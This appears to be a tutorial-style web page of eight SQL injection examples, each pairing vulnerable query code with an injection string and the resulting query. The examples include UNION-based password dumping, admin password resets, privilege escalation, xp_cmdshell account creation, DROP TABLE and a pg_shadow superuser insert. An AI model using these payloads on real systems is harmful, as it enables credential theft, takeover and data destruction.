MENU
Hacking Techniques
| Example 1 |
| Server Code: SELECT * FROM users WHERE userid = $input |
| Injection for $input: 99 OR TRUE |
| Executed Command: SELECT * FROM users WHERE userid = 99 OR TRUE |
| This may permit the hacker to obtain all usernames and passwords, as the WHERE clause always evaluates to TRUE. |
| Example 2 |
| Server Code: SELECT * FROM users WHERE username = ‘$input’ |
| Injection for $input: ‘ OR TRUE -- |
| Executed Command: SELECT * FROM users WHERE username = ‘’ OR TRUE -- ‘ |
| This may permit the hacker to obtain all usernames and passwords, as the WHERE clause always evaluates to TRUE. Ending a string immediately with the single quote and commenting out the rest of the query are common forms of SQL injection. |
| Example 3 |
| Server Code: SELECT id, name, dt, size FROM products WHERE size=’$size’ |
| Injection for $size: ‘ UNION SELECT ‘1’, CONCAT(uname,’-‘,passwd) AS NAME, ‘2000-01-01’, ‘0’ FROM users -- |
| Executed Command: SELECT id, name, dt, size FROM products WHERE size=’’ UNION SELECT ‘1’, CONCAT(uname,’-‘,’passwd) AS NAME, ‘2000-01-01’, ‘0’ FROM users --‘ |
| This obtains the usernames and passwords even when the table containing them is not being accessed directly. |
| Example 4 |
| Server Code: UPDATE usertable SET password='$pwd' WHERE username='$uid' |
| Injection for $pwd: xxx Injection for $uid: ‘ OR uid LIKE ‘%admin% |
| Executed Command: UPDATE usertable SET password=’xxx’ WHERE username=‘’ OR uid LIKE ‘%admin%’ |
| This changes the admin’s password. |
| Example 5 |
| Server Code: UPDATE usertable SET password='$pwd' WHERE username='$uid' |
| Injection for $pwd: xxx’, trusted=100, admin=’yes |
| Executed Command: UPDATE usertable SET passwordwd='xxx’, trusted=100, admin=’yes’ WHERE username='...' |
| This grants more priveleges to an account illegally. |
| Example 6 |
| Server Code: SELECT * FROM products WHERE id LIKE '%$prod%' |
| Injection for $prod: a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- |
| Executed Command: SELECT * FROM products WHERE id LIKE '%a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- %' |
| This gives the attacker access to a machine running MSSQL Server. |
Example 7 |
| Server Code: SELECT * FROM users WHERE userid = $input |
| Injection for $input: 99; DROP TABLE suppliers |
| Executed Command: SELECT * FROM users WHERE userid = 99; DROP TABLE suppliers |
| This deletes a table from the table illegally. Note that this hacking technique works only in systems that support multiple batched SQL statements within a query. Some PHP systems support only one SQL statement per query. |
| Example 8 |
| Server Code: SELECT id, name FROM products ORDER BY name LIMIT 30 OFFSET $offset |
| Injection for $offset: 0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; -- |
| Executed Command: SELECT id, name FROM products ORDER BY name LIMIT 30 OFFSET 0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; -- |
| This grants the hacker superuser access. Note that this hacking technique works only in systems that support multiple batched SQL statements within a query. Some PHP systems support only one SQL statement per query. |